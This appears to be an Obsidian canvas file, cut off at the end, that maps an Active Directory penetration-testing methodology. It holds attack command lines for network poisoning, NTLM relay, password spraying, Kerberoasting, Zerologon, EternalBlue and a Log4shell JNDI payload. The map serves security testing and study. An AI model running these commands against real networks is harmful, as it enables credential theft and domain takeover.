{
	"nodes":[
		{"id":"d9007a482e22c659","type":"group","x":80,"y":1986,"width":4280,"height":1797,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"0bd291135572da94","type":"group","x":80,"y":-1048,"width":3620,"height":1550,"color":"5","label":"LOW HANGING FRUIT"},
		{"id":"3ea4a8bc304baecf","type":"group","x":-2960,"y":531,"width":2160,"height":1456,"label":"NO CREDENTIALS"},
		{"id":"541337b61b300092","type":"group","x":80,"y":772,"width":2991,"height":973,"color":"#3266b8","label":"GOT USERNAME BUT NO PASSWORD"},
		{"id":"59fad8fbbf0a9f70","type":"group","x":-6720,"y":-2287,"width":1640,"height":1647,"color":"5","label":"LOW HANGING FRUIT"},
		{"id":"11fa4a8af739fe5e","type":"group","x":-6720,"y":1745,"width":1480,"height":1075,"color":"#2c68c9","label":"GOT VALID USERNAME BUT NO PASSWORD"},
		{"id":"9c12cac94ea98026","type":"group","x":-6720,"y":969,"width":860,"height":457,"label":"POISONING"},
		{"id":"ad750d36e7cbce0f","type":"group","x":-6020,"y":5120,"width":720,"height":457,"color":"#dedede","label":"GOT LOW ACESS"},
		{"id":"d60307aadf1a5784","type":"group","x":-7733,"y":5328,"width":720,"height":457,"color":"5","label":"NO CREDS VULNS"},
		{"id":"371b1b37981f41b3","type":"group","x":-3580,"y":5785,"width":720,"height":457,"color":"6","label":"LATERAL MOVEMENT"},
		{"id":"d9a6c31d0937a051","type":"group","x":-7140,"y":6242,"width":720,"height":457,"color":"#6f4d4d","label":"NEED CREDS VULNS"},
		{"id":"c867dcbe12b58237","type":"group","x":-5300,"y":6349,"width":720,"height":457,"color":"#e17add","label":"GOT LOCAL ADMIN"},
		{"id":"a6724c7c34def4f6","type":"group","x":-2500,"y":6577,"width":720,"height":457,"color":"#3e1e09","label":"TRUST ABUSE"},
		{"id":"90562e5d23ab0f99","type":"group","x":-7860,"y":7332,"width":720,"height":457,"color":"#1438a3","label":"GOT USERNAME"},
		{"id":"665bffcbe7cba5e3","type":"group","x":-7860,"y":8343,"width":720,"height":457,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"88cb0cd64ce5a5ff","type":"group","x":-6580,"y":7200,"width":720,"height":457,"color":"4","label":"GOT CREDENTIALS"},
		{"id":"e80b00b9c2b3c0e1","type":"group","x":-5820,"y":8572,"width":720,"height":457,"color":"2","label":"CRACKING HASH"},
		{"id":"dd88462ff5f0bb21","type":"group","x":-5460,"y":7104,"width":720,"height":457,"color":"#0e0ad6","label":"DACL ABUSE"},
		{"id":"6040b032c88aaf14","type":"group","x":-4598,"y":7657,"width":720,"height":457,"color":"#16446f","label":"KERBEROS DELEGATION"},
		{"id":"e4a7357b63443fc7","type":"group","x":-4580,"y":9200,"width":720,"height":457,"color":"#7906a2","label":"ADCS ABUSE"},
		{"id":"e2d5e5607533f2fe","type":"group","x":-3220,"y":7200,"width":720,"height":457,"color":"1","label":"DOAMIN ADMIN"},
		{"id":"f6c1143c67c38824","type":"group","x":-2500,"y":8114,"width":720,"height":457,"color":"#a6df77","label":"PERSISTANCE"},
		{"id":"6f25b188541cb24c","type":"group","x":-6720,"y":1506,"width":860,"height":180,"label":"COERCE"},
		{"id":"6a639a7cfec0a00a","type":"text","text":"###### [[FIND VULNERABLE HOST.canvas|FIND VULNERABLE HOST]]","x":-5760,"y":-362,"width":280,"height":50,"color":"5"},
		{"id":"03d358dabc1f2314","type":"text","text":"###### LOW ACCESS","x":-5281,"y":-1006,"width":180,"height":52},
		{"id":"25e7ab93daeb164c","type":"text","text":"# Scan Network\n- 🕷️ `nxc smb <cidr>` # enumerate smb hosts\n- ⚪ `nmap -sP <cidr>` # ping scan\n- ⚪ `nmap -PN -sV --top-port 50 --open <ip>` # quick scan\n- ⚪ `nmap -PN --script smb-vuln* -p139,445 <ip>` # search smb vuln\n- ⚪ `nmap -PN -sC -sV -oA <output> <ip>` # classic scan\n- ⚪ `nmap -PN -sC -sV -p- -oA <output> <ip>` # full scan\n- ⚪ `nmap -sU -sC -sV -oA <output> <ip>` # udp scan","x":-6717,"y":-481,"width":857,"height":287},
		{"id":"34187a56d891a1a8","type":"text","text":"# 💥 Proxyshell","x":-6699,"y":-1028,"width":1019,"height":74,"color":"5"},
		{"id":"c85b03b54484ba38","type":"text","text":"# 💥 Proxylogon","x":-6699,"y":-1128,"width":1019,"height":80,"color":"5"},
		{"id":"c0247957c389b335","type":"text","text":"# Vulnerable product with CVE\n- ⚪ `searchsploit`","x":-6699,"y":-1255,"width":1019,"height":107,"color":"5"},
		{"id":"9f3a048494731715","type":"text","text":"# Java serialized port\n- ⚪ `ysoserial`","x":-6699,"y":-1382,"width":1019,"height":107,"color":"5"},
		{"id":"3dd4f510abda2abd","type":"text","text":"###### MSSQL CONNECTION","x":-5341,"y":-738,"width":240,"height":50,"color":"#0e0c27"},
		{"id":"1bf86342b08cb8e8","type":"text","text":"# Database credentials\n- Ⓜ️ `use admin/mssql/mssql_enum_sql_logins`","x":-6699,"y":-767,"width":1019,"height":107,"color":"5"},
		{"id":"ee053d26291636fb","type":"text","text":"# 💥 Log4shell\n- `${jndi:ldap://<ip>:<port>/o=reference}`\n- `rogueJndi-1.0.jar`","x":-6698,"y":-934,"width":1018,"height":143,"color":"5"},
		{"id":"7b385487f48d5ef7","type":"text","text":"# [[ARP poisonong]]","x":-2059,"y":1815,"width":280,"height":50},
		{"id":"65ba0771b00171ba","type":"text","text":"# [[Poisoning]]","x":-2390,"y":1735,"width":214,"height":50},
		{"id":"34819c844e77a2ab","type":"text","text":"# [[IPV6 prefered to IPV4]]","x":-2059,"y":1735,"width":380,"height":50},
		{"id":"bbae7070c2811ae0","type":"text","text":"# [[Find user list]]","x":-2390,"y":1515,"width":254,"height":50},
		{"id":"05535f6e59725a9d","type":"text","text":"# Find DC IP\n- ⚪ `nmcli dev show <network_interface>` # show domain name & dns\n- ⚪ `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>`","x":-6717,"y":-169,"width":857,"height":153},
		{"id":"fe790c9c77137336","type":"text","text":"# Zone transfer\n- ⚪ `dig axfr <domain_name>@<name_server>`","x":-6720,"y":9,"width":860,"height":122},
		{"id":"41b126d073e8cabe","type":"text","text":"# ARP poisoning \n- ⚪ `bettercap`","x":-6700,"y":1286,"width":800,"height":112},
		{"id":"c30c67bc1c111165","type":"text","text":"###### POISONING SMB -> HTTP ->","x":-5780,"y":1181,"width":300,"height":50,"color":"3"},
		{"id":"3015edbb972e1820","type":"text","text":"# NO CREDENTIALS","x":-2920,"y":1245,"width":320,"height":50},
		{"id":"9dc8a6b3c53cabaa","type":"text","text":"# [[Scan network]]","x":-2390,"y":614,"width":260,"height":87},
		{"id":"388c4acd41c471e4","type":"text","text":"# [[Enumerate LDAP]]","x":-2390,"y":1335,"width":314,"height":50},
		{"id":"b28a0d771dd4971b","type":"text","text":"# [[Zone transfer]]","x":-2390,"y":942,"width":260,"height":92},
		{"id":"1430b00e84152755","type":"text","text":"# [[List guest access on SMB share]]","x":-2390,"y":1127,"width":515,"height":50},
		{"id":"0e528726accacaa0","type":"text","text":"###### COERCE SMB","x":-5660,"y":1579,"width":180,"height":50,"color":"3"},
		{"id":"b1cf230b9e256ed7","type":"text","text":"# 💥 Unauthent PetitPotam (CVE-2022-26925)\n- ⚪ `PetitPotam.py -d <domain> <listener_ip> <target_ip>`","x":-6700,"y":1536,"width":800,"height":135},
		{"id":"76ad10e31f955321","type":"text","text":"# 🔥 LLMNR, NBTNS, MDNS \n- ⚪ `responder -I <network_interface>` (use `--lm` to force lm downgrade) # disable smb && http if relay ","x":-6700,"y":999,"width":800,"height":135},
		{"id":"692ed4a9a99c67b0","type":"text","text":"# IPV6 prefered to IPV4\n- ⚪ `mitm6 -d <domain>`","x":-6700,"y":1146,"width":800,"height":120},
		{"id":"96e4a6c304948f6c","type":"text","text":"# Tomcat & jboss manager\n","x":731,"y":-342,"width":416,"height":50},
		{"id":"c1981b07eacb0821","type":"text","text":">[!bug] ","x":-2441,"y":-404,"width":601,"height":304},
		{"id":"785c898ae427bffa","type":"text","text":"# [[FIND VULNERABLE HOST.canvas|FIND VULNERABLE HOST]]","x":100,"y":-356,"width":420,"height":83,"color":"5"},
		{"id":"f05d50dde76fe618","type":"text","text":"# [[Find DC IP]]","x":-2390,"y":823,"width":220,"height":74},
		{"id":"bb306da839d61057","type":"text","text":"# 🔥 [[LLMNR, NBTNS, MDNS]]","x":-2059,"y":1643,"width":423,"height":50},
		{"id":"54e57561f98b7ef2","type":"text","text":"# [[Coerce]]","x":-2390,"y":1896,"width":174,"height":50},
		{"id":"9c48568ae7bb0940","type":"text","text":"# List guest access on SMB share\n- ⚪ `enum4linux -a -u \"\" -p \"\" <dc_ip>`\n- ⚪ `enum4linux -a -u \"guest\" -p \"\" <dc_ip>`\n- ⚪ `smbmap -u \"\" -p \"\" -P 445 -H <dc_ip>`\n- ⚪ `smbmap -u \"\" -p \"guest\" -P 445 -H <dc_ip>`\n- ⚪ `smbclient -U '%' -L //<dc_ip>`\n- ⚪ `smbclient -U 'guest%' -L //<dc_ip>`\n- 🕷️ `nxc smb <ip> -u '' -p ''` # enumerate null session\n- 🕷️ `nxc smb <ip> -u 'a' -p ''` # enumerate anonymous access**","x":-6719,"y":156,"width":859,"height":309},
		{"id":"0016ccb346181884","type":"text","text":"###### USERNAME FOUND","x":-5700,"y":643,"width":220,"height":50,"color":"#2c68c9"},
		{"id":"bc47b0c846eb0a33","type":"text","text":"# Find user list\n- ⚪ `enum4linux -U <dc_ip> | grep 'user:'`\n- ⚪ `net rpc group members 'Domain Users' -W '<domain>' -I '<ip>' -U '%'`\n- ⚪ `OSINT` # enumerate username on internet (e.g [[Linkedin2Username]])\n- ⚪ `nmap -p 88 --script=krb5-enum-users --script-args=\"krb5-enum-users.realm='<domain>', userdb=<user_list_file>\" <ip>`","x":-6718,"y":666,"width":858,"height":231},
		{"id":"3bc8c5a5f39bc962","type":"text","text":"# Enumerate LDAP\n- ⚪ `nmap -n -sV --script \"ldap* and not brute\" -p389 <dc_ip>`\n- ⚪ `ldapsearch -x -h <ip> -s base`","x":-6718,"y":490,"width":858,"height":153},
		{"id":"d7fcddef7c5e9978","type":"text","text":"# ADMIN","x":3300,"y":-451,"width":168,"height":50,"color":"#ab54a4"},
		{"id":"0a1bf2eb0c3ce934","type":"text","text":"# Java rmi\n","x":731,"y":-227,"width":195,"height":50},
		{"id":"11b392e3acb18b92","type":"text","text":"\n- ⚪ `zerologon-scan '<dc_netbios_name>' '<ip>'`\n- ⚪ `python3 cve-2020-1472-exploit.py <machine_bios_name> <ip>`\n- 🟣 `secretdump.py <domain>/<machine_bios_name>\\$@<ip> -no-pass -just-dc-user \"administrator\"`\n- 🟣 `secretdump.py -hashes:<hash_admin> <domain>/Administrator@<ip>`\n- ⚪ `python3 restorepassword.py -target-ip <ip> <domain>/<machine_bios_name>@<machine_bios_name> -hexpass <HEXPASS>`","x":-6699,"y":-2267,"width":1019,"height":280,"color":"5"},
		{"id":"48ab6d969705cfd2","type":"text","text":"# Java rmi\n- Ⓜ️ `use exploit/multi/misc/java_rmi_server`","x":-6699,"y":-1509,"width":1019,"height":107,"color":"5"},
		{"id":"4b2bb45c138768ef","type":"text","text":"###### ADMIN","x":-5221,"y":-2023,"width":120,"height":56,"color":"6"},
		{"id":"ad93a25aef8ed5a4","type":"text","text":"# 💥 Eternal Blue (MS17-010)\n- Ⓜ️ `use exploit/windows/smb/ms17_010_eternalblue`","x":-6699,"y":-1967,"width":1019,"height":120,"color":"5"},
		{"id":"da11d926b3d13476","type":"text","text":"###### DOMAIN ADMIN","x":-5301,"y":-1491,"width":200,"height":50,"color":"1"},
		{"id":"b16618c87aa4008a","type":"text","text":"# 💥 SYSVOL & GPP (MS14-025)\n- Ⓜ️ `use scaner/smb/smb_enum_gpp`\n- ⚪ `findstr /S /I cpassword \\\\<FQDN>\\sysvol\\<FQDN>\\policies\\*.xml`","x":-6699,"y":-1827,"width":1019,"height":138,"color":"5"},
		{"id":"54b1fa6c5af005ec","type":"text","text":"# Tomcat & jboss manager\n- Ⓜ️ `use auxiliary/scanner/http/tomcat_enum`\n- Ⓜ️ `use exploit/multi/http/tomcat_mgr_deploy` ","x":-6699,"y":-1669,"width":1019,"height":140,"color":"5"},
		{"id":"1428c686bf497881","type":"text","text":"# NetNTLMv1","x":2084,"y":2043,"width":236,"height":50,"color":"2"},
		{"id":"eb27e4ad299d1883","type":"text","text":"###### HASH FOUND (TGS)","x":2792,"y":1503,"width":240,"height":57,"color":"2"},
		{"id":"7376b0c07bbb81e5","type":"text","text":"###### LATERAL MOVE (PTT)","x":2792,"y":1639,"width":240,"height":50,"color":"#312d67"},
		{"id":"37aea7f7397ead68","type":"text","text":"###### CLEAR TEXT CREDENTIALS  toto FOUND","x":2672,"y":1104,"width":360,"height":50,"color":"4"},
		{"id":"9c562e5de092c0ad","type":"text","text":"###### HASH FOUND (TGT)","x":2792,"y":1380,"width":240,"height":57,"color":"2"},
		{"id":"bb800896d678e126","type":"text","text":"```bash\n- ⚪ python3 CVE-2022-33679.py '<domain>'/'<user>' '<target>'\n```","x":1823,"y":1635,"width":629,"height":58},
		{"id":"33bd96f32fbf44e3","type":"text","text":"# NetNTLMv2","x":2084,"y":2111,"width":236,"height":50,"color":"2"},
		{"id":"942dba13409879bf","type":"text","text":"# MSSQL CONNECTION","x":3300,"y":-82,"width":380,"height":50,"color":"#2a1a56"},
		{"id":"7873ce17589aa035","type":"text","text":"# LOW ACCESS","x":3300,"y":-197,"width":254,"height":50,"color":"#5c5c5c"},
		{"id":"e2dc483bd8ccf9e9","type":"text","text":"# DOMAIN ADMIN","x":3300,"y":-317,"width":300,"height":50,"color":"1"},
		{"id":"a0649b6fb6d7f5c3","type":"text","text":"```bash\n- ⚪ nmap -Pn -sS -T4 --open --script smb-security-mode -p445 '<cidr>'\n- Ⓜ️ use exploit/windows/smb/smb_relay\n- 🕷️ nxc smb '<cidr>' --gen-relay-list '<output>'\n```","x":2207,"y":2763,"width":706,"height":116},
		{"id":"789cb0bc8fc38e27","type":"text","text":"Relay to LDAP","x":2379,"y":2492,"width":181,"height":56},
		{"id":"a7a2896b03a06edd","type":"text","text":"# ADMIN","x":2532,"y":2352,"width":168,"height":50},
		{"id":"f68fec1905c4667e","type":"text","text":"Find SMB not signed (default on non DC)","x":1744,"y":2796,"width":387,"height":50},
		{"id":"2ef6d2610896eb38","type":"text","text":"# 💥 Remove mic (CVE-2019-1040)","x":1744,"y":2542,"width":543,"height":50},
		{"id":"7a0b9b60fd58a854","type":"text","text":"Remove mic","x":1884,"y":2442,"width":160,"height":50},
		{"id":"497a9278ba659d0e","type":"text","text":"VRAI CHANGEMENT","x":2912,"y":640,"width":250,"height":60},
		{"id":"02122e030ba48b6e","type":"text","text":"# USERS","x":2084,"y":2183,"width":176,"height":50,"color":"#4c63d6"},
		{"id":"fe4f4339e873434f","type":"text","text":"```shell\n- 🕷️ nxc '<ip>' -u '<user>' -p '<password>' --pass-pol\n- ⚪ enum4linux -u '<username>' -p '<password>' -P <ip>\n- 🔵 Get-ADDefaultDomainPasswordPolicy\n- 🔵 Get-ADFineGrainedPolicy -filter *\n- 🔵 Get-ADUserResultantPasswordPolicy -Identity <user>\n- ⚪ ldapsearch-ad.py --server '<dc>' -d '<domain>' -u '<user>' -p '<password>' --type pass-pols\n```","x":1667,"y":857,"width":920,"height":185},
		{"id":"ccf5e832d3a11577","type":"text","text":"# ADCS (ESC8)","x":1744,"y":3121,"width":256,"height":50,"color":"#a13698"},
		{"id":"c167c0d06d1c881e","type":"text","text":"# 💥 MS08-068\n","x":1354,"y":2353,"width":276,"height":50},
		{"id":"2dcf501997be2fb2","type":"text","text":"NetNTMLv1","x":1417,"y":2442,"width":160,"height":50},
		{"id":"34ade41f491a3d5b","type":"text","text":"NetNTMLv2","x":1417,"y":2542,"width":160,"height":50},
		{"id":"2f414db711360a7c","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t ldap://'<dc>' --shadow-credentials --shadow-target '<dc>'\n```","x":2843,"y":2534,"width":767,"height":58},
		{"id":"881143fb73210229","type":"text","text":"# LATERAL MOVE (SOCKS)","x":2459,"y":3333,"width":421,"height":50},
		{"id":"5d60393c351fe84d","type":"text","text":"# LATERAL MOVE (SOCKS)","x":2540,"y":3029,"width":420,"height":50},
		{"id":"4f8ce4840558fe8e","type":"text","text":"# USERS","x":2540,"y":2944,"width":170,"height":50},
		{"id":"9857de892869bb7b","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -tf '<targets.txt>' -smb2support (-6) --enum-domain\n```","x":1744,"y":2944,"width":696,"height":50},
		{"id":"001e63d03931ee8e","type":"text","text":"```bash\n- 🔥🟣 ntlmrelayx.py -tf '<targets.txt>' -smb2support -socks (-6)\n```","x":1744,"y":3029,"width":656,"height":50},
		{"id":"2957d653e2ebf9b5","type":"text","text":"```shell\n- 🟡 Get-DomainUser -PreauthNotRequired -Properties SamAccountName\n- 🔴 MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPatch((u)-[*1..]->(c)) RETURN p\n```","x":1712,"y":1233,"width":940,"height":80},
		{"id":"d3012fa932bbfa77","type":"text","text":"```bash\n- Ⓜ️ use exploit/windows/smb/smb_relay # windows200 / windows server 2008\n```","x":1686,"y":2347,"width":732,"height":60},
		{"id":"7380324d95dd3c35","type":"text","text":"```bash\n- 🟣 GetNPUsers.py '<domain>'/ -userfile '<username_list>' -format hashcat -outputfile '<hashes.txt>'\n- 🔵 Rubeus.exe asreproast /format:hashcat\n```","x":1540,"y":1370,"width":950,"height":80},
		{"id":"f26b5a7d3145c1b3","type":"text","text":"```bash\n- Ⓜ️ use admin/mssql/mssql_enum_sql_logins\n```","x":1224,"y":428,"width":456,"height":54},
		{"id":"61ffb9aeef9dc609","type":"text","text":"```bash\n- ⚪ searchsploit\n```","x":1269,"y":-1,"width":244,"height":55},
		{"id":"0b0cc489b2f53a2b","type":"text","text":"```bash\n- ⚪ ysoserial\n```","x":1269,"y":-100,"width":224,"height":55},
		{"id":"1ea1dd1462779b8b","type":"text","text":"```bash\n- Ⓜ️ use auxiliary/scanner/http/tomcat_enum\n- Ⓜ️ use exploit/multi/http/tomcat_mgr_deploy\n```","x":1229,"y":-356,"width":484,"height":78},
		{"id":"dd00ff085f651ea5","type":"text","text":"```bash\n- Ⓜ️ use exploit/multi/misc/java_rmi_server\n```","x":1229,"y":-234,"width":484,"height":64},
		{"id":"862baf5b0391d60a","type":"text","text":"```bash\n- 🟣 GetUserSPNs.py -no-preauth '<asrep_user>' -userfile '<username_list>' -dc-host '<dc_ip>' '<domain>'/\n- 🔵 Rubeus.exe kerberoast /domain:'<domain>' /dc:'<dc_ip>' /nopreauth:'<asrep_user>' /spns:'<users.list>'\n```","x":1577,"y":1487,"width":1010,"height":88},
		{"id":"4ae129df164ce3ce","type":"text","text":"Relay to MSSQL","x":1397,"y":3333,"width":190,"height":50},
		{"id":"a8718e8eb16f9d1e","type":"text","text":"Get hash","x":1153,"y":1383,"width":147,"height":54},
		{"id":"85f826f0310f772e","type":"text","text":"SMB unsigned","x":1359,"y":2894,"width":181,"height":50},
		{"id":"28210b6a4105561b","type":"text","text":"# HTTP ADCS web","x":1387,"y":3121,"width":307,"height":50},
		{"id":"d52e894f7172291a","type":"text","text":"SCCM NTLM relay attack","x":1387,"y":3221,"width":270,"height":55},
		{"id":"3a24641aae49651c","type":"text","text":"# 💥 [[CVE-2022-33679]]","x":1153,"y":1639,"width":381,"height":50},
		{"id":"c2393c971ddeebac","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t ldaps://'<dc>' --remove-mic --add-computer '<computer_name>' '<computer_password>' --delegate-access -smb2support\n```","x":2843,"y":2437,"width":1237,"height":68},
		{"id":"95955126bf8e010a","type":"text","text":"# RBCD","x":4160,"y":2446,"width":160,"height":50},
		{"id":"2bd0faedfbf03299","type":"text","text":"# USERS","x":3830,"y":2630,"width":170,"height":50},
		{"id":"ac9c574b52fbe02c","type":"text","text":"# SHADOW CREDENTIALS","x":3700,"y":2538,"width":420,"height":50},
		{"id":"b725b04e8755e297","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py --remove-mic --escalate-user '<user>' -t ldap://'<dc_fqdn>' -smb2support\n```","x":2843,"y":2350,"width":877,"height":60},
		{"id":"b32110d36ae83435","type":"text","text":"# DCSYNC","x":3820,"y":2355,"width":200,"height":50},
		{"id":"67663966dd2f0c86","type":"text","text":"# [[Blind Kerberoasting]]","x":1152,"y":1506,"width":360,"height":50},
		{"id":"916e0b10a9c887fa","type":"text","text":"Coerce come from DC01, relay to DC02","x":2254,"y":3496,"width":425,"height":50},
		{"id":"4f8cb48c8b12ae99","type":"text","text":"# 💥 Zero-Logon : safe method (CVE-2020-1472)","x":1449,"y":3496,"width":731,"height":50},
		{"id":"76879583581dac73","type":"text","text":"# -> MSSQL","x":1039,"y":3333,"width":218,"height":50},
		{"id":"e2e61aab56bf55a4","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t dcsync://'<dc02_ip>' -smb2support -auth-smb '<user>':'<password>'\n```","x":2739,"y":3489,"width":840,"height":65},
		{"id":"ce9731f06ac9b669","type":"text","text":"# -> SMB -> Netlogon","x":1039,"y":3496,"width":338,"height":50},
		{"id":"db137f8c979db56b","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -wh '<attacker_ip>' -t ldap://'<target>' -l /tmp -6 -debug\n```","x":2843,"y":2625,"width":886,"height":59},
		{"id":"6c7f430bd5ba0a4f","type":"text","text":"# DCSYNC","x":3659,"y":3497,"width":201,"height":50},
		{"id":"cec2ba1e862c4aca","type":"text","text":"```bash\n- 🟣 pywsus.py\n```","x":1379,"y":3657,"width":220,"height":65},
		{"id":"006f6db58f5ecd62","type":"text","text":"# WSUS relay","x":1039,"y":3664,"width":240,"height":50},
		{"id":"a1026363af16faa8","type":"text","text":"```bash\n- ⚪ python3 cve-2020-1472-exploit.py '<machine_bios_name>' '<ip>'\n\n- 🟣 secretdump.py '<domain>'/'<machine_bios_name>'\\$@'<ip>' -no-pass -just-dc-user \"administrator\"\n\n- 🟣 secretdump.py -hashes:'<hash_admin>' '<domain>'/Administrator@'<ip>'\n```","x":1391,"y":-891,"width":940,"height":165},
		{"id":"a187bd39018f9b2f","type":"text","text":"```bash\n- Ⓜ️ use scaner/smb/smb_enum_gpp\n```","x":1391,"y":-573,"width":372,"height":62},
		{"id":"253142c880431a69","type":"text","text":"```bash\n- Ⓜ️ use exploit/windows/smb/ms17_010_eternalblue\n```","x":1391,"y":-672,"width":513,"height":52},
		{"id":"1da6677ae8f7e8a9","type":"text","text":"# -> SMB","x":1039,"y":2894,"width":178,"height":50},
		{"id":"be9c1bb18e261d15","type":"text","text":"# -> HTTP","x":1039,"y":3171,"width":198,"height":50},
		{"id":"2159909e792c0a61","type":"text","text":"```bash\n- 🔥⚪ responder -I '<network_interface>' # use `--lm` to force lm downgrade\n```","x":1039,"y":2023,"width":741,"height":60},
		{"id":"17f6f195c606b7c0","type":"text","text":"# HTTP(S) -> LDAP","x":1039,"y":2652,"width":318,"height":54},
		{"id":"670754020be214b1","type":"text","text":"# SMB -> LDAP(S)","x":1039,"y":2492,"width":298,"height":50},
		{"id":"5f2413fa4d01c14d","type":"text","text":"Relay on itself","x":1039,"y":2350,"width":181,"height":57},
		{"id":"dbfe48fd23ce2482","type":"text","text":"```bash\n- 🟣 smbclient.py # listen\n```","x":1039,"y":2190,"width":315,"height":53},
		{"id":"fd8ee50425c066b0","type":"text","text":"```bash\n- 🔵 findstr /S /I cpassword \\\\'<FQDN>'\\sysvol\\'<FQDN>'\\policies\\*.xml\n```","x":1391,"y":-471,"width":692,"height":60},
		{"id":"1fee7411ae40891e","type":"text","text":"```bash\n- ⚪ python3 restorepassword.py -target-ip '<ip>' '<domain>'/'<machine_bios_name>'@'<machine_bios_name>' -hexpass '<HEXPASS>'\n```","x":2411,"y":-872,"width":580,"height":127},
		{"id":"d6c598adab3a2f92","type":"text","text":"```bash\n- rogueJndi-1.0.jar\n```","x":1621,"y":316,"width":260,"height":55},
		{"id":"874eb7aa0cb6f112","type":"text","text":"# Vulnerable product with CVE\n","x":731,"y":1,"width":482,"height":50},
		{"id":"5601b5033b6b975e","type":"text","text":"# Java serialized port\n","x":731,"y":-100,"width":338,"height":50},
		{"id":"e5cd021d720fc19d","type":"text","text":"# 🔥 [[Password Spraying]]\n\n- 🕷️ `nxc smb '<dc_ip>' -u '<user_list>' -p '<password_list>' --no-bruteforce # test user = password`","x":480,"y":765,"width":1013,"height":144},
		{"id":"efbc830114eff45d","type":"text","text":"# 💥 Proxyshell","x":731,"y":224,"width":270,"height":50},
		{"id":"b8dae52ffdac2f8a","type":"text","text":"# 💥 Proxylogon","x":731,"y":124,"width":270,"height":50},
		{"id":"875f19bbf148476d","type":"text","text":"```bash\n- ${jndi:ldap://'<ip>':'<port>'/o=reference}\n```","x":1081,"y":317,"width":480,"height":53},
		{"id":"14457bd46e7ba67f","type":"text","text":"# 💥 Log4shell\n","x":732,"y":318,"width":249,"height":50},
		{"id":"faeba0d1a0aa233c","type":"text","text":"Get ASREPRoastable users (need credentials) ","x":1152,"y":1247,"width":480,"height":52},
		{"id":"daa6761c34288f00","type":"text","text":"```bash\n- 🕷️ nxc smb '<dc_ip>' -u '<user_list>' -p '<password_list>' --no-bruteforce # test user = password\n- 🕷️ nxc smb '<dc_ip>' -u '<user_list>' -p '<password_list>' # multiple test (carrefull of lock policy)\n- ⚪ sprayhound -U '<user_list>' -d '<domain>' -dc '<dc_ip>'\n```","x":1152,"y":1074,"width":1000,"height":110},
		{"id":"5705b9ca52b582cd","type":"text","text":">[!warning] Get the password policy (need creds, but you should get the policy before spray)","x":1152,"y":909,"width":440,"height":80},
		{"id":"dd7059f977e01545","type":"text","text":"# GOT USERNAME BUT NO PASSWORD","x":120,"y":1202,"width":360,"height":111,"color":"#48599d"},
		{"id":"c701bb029d4e4fea","type":"text","text":"# [[AS-REPRoasting]]","x":601,"y":1441,"width":310,"height":50},
		{"id":"c2b010f4e306211f","type":"text","text":"# NTLM relay","x":620,"y":2895,"width":238,"height":50},
		{"id":"6739c4820c8b6371","type":"text","text":"# MITM (LISTEN & RELAY)","x":120,"y":2895,"width":400,"height":50,"color":"3"},
		{"id":"c05816514e5c01c4","type":"text","text":"# Listen","x":620,"y":2098,"width":159,"height":50},
		{"id":"ea6a21ad25a26f3d","type":"text","text":"```bash\n- ⚪ zerologon-scan '<dc_netbios_name>' '<ip>'\n```","x":1391,"y":-1028,"width":504,"height":60},
		{"id":"ea4004269251f3a5","type":"text","text":"# 💥 SYSVOL & GPP (MS14-025)","x":731,"y":-511,"width":498,"height":40},
		{"id":"122a4639563d0a19","type":"text","text":"# 💥 Eternal Blue (MS17-010)","x":731,"y":-666,"width":460,"height":40},
		{"id":"7adcda0adfe3120c","type":"text","text":"# 🚨💥 Zerologon (CVE-2020-1472)","x":731,"y":-941,"width":562,"height":50},
		{"id":"b61c915f2f57038d","type":"text","text":"# Database credentials\n","x":731,"y":430,"width":369,"height":50},
		{"id":"ca2551b5c98b60d4","type":"text","text":"# ARP poisoning","x":620,"y":3664,"width":279,"height":50},
		{"id":"cd5befaf41c3d555","type":"text","text":"###### LATERAL MOVE (PTT)","x":-5522,"y":2715,"width":240,"height":50,"color":"#0e0c27"},
		{"id":"2db44ec13f029b46","type":"text","text":"###### HASH FOUND (TGS)","x":-5522,"y":2555,"width":240,"height":50,"color":"2"},
		{"id":"74c3211d4ab0b365","type":"text","text":"```bash\n- 🟣 ntlmrelayx.py -t mssql://'<ip>' -smb2support -socks\n```","x":-2365,"y":6689,"width":576,"height":50},
		{"id":"6aaa2de15c1e781e","type":"text","text":"# [[NO CREDENTIALS VULNS.canvas|NO CREDS VULNS]]","x":-7555,"y":5529,"width":363,"height":50,"color":"5"},
		{"id":"1ae082cde5839a47","type":"text","text":"# 💥 [[Unauthent PetitPotam (CVE-2022-26925)]]","x":-2129,"y":1896,"width":700,"height":50},
		{"id":"75ab192397d283b6","type":"text","text":"# Code couleur : \n\ngot username : R:20-G:56-B:163\nMITM : Jaune\ngot credentials : vert\ncracking hash : orange\nno creds vulns : Turquoise\nneed creds vulns : R:111-G:77-B:77\nlocal admin : 225-121-221\nlateral movement : violet\nDACL abuse : R:10-G:14-B:214\ndomain admin : red\nADCS abuse : R:121-G:6-B:162\nkerberos delegation : R:22-G:68-B:111\ntrust abuse: R:62-G:30-B:9\npersistance : R:166-G:223-B:119\nknown vulnerabilities R:196 G:233 B:63","x":-3124,"y":3266,"width":364,"height":720},
		{"id":"a75e9e832c1f8198","type":"text","text":"# [[GOT USERNAME.canvas|GOT USERNAME]]","x":-7642,"y":7532,"width":295,"height":50,"color":"#2c30ba"},
		{"id":"946bd430dd511880","type":"text","text":"## [[MITM (LISTEN & RELAY).canvas|MITM (LISTEN & RELAY)]]","x":-7676,"y":8548,"width":358,"height":50,"color":"3"},
		{"id":"8348c2e5f1a5ca9f","type":"text","text":"# [[GOT CREDENTIALS.canvas|GOT CREDENTIALS]]","x":-6402,"y":7401,"width":363,"height":50,"color":"5"},
		{"id":"31bc6bd9b75ae5af","type":"text","text":"⚪ : Linux commands\n⚫ : CMD commands\n🔵 : Powershell commands\n🟣 : Impackets\n🔴 : Bloodhound \n🟡 : Powerview\n🕷️ : Netexec\nⓂ️ : Metasploit\n","x":-3102,"y":2715,"width":320,"height":230},
		{"id":"28b29390c2d6dec8","type":"text","text":"Main catégorie : (#)\nHighlight techniques : (##)\nCVE techniques : (##) + 💥\nQuick wins : 🔥 \n\n","x":-3102,"y":2970,"width":320,"height":132},
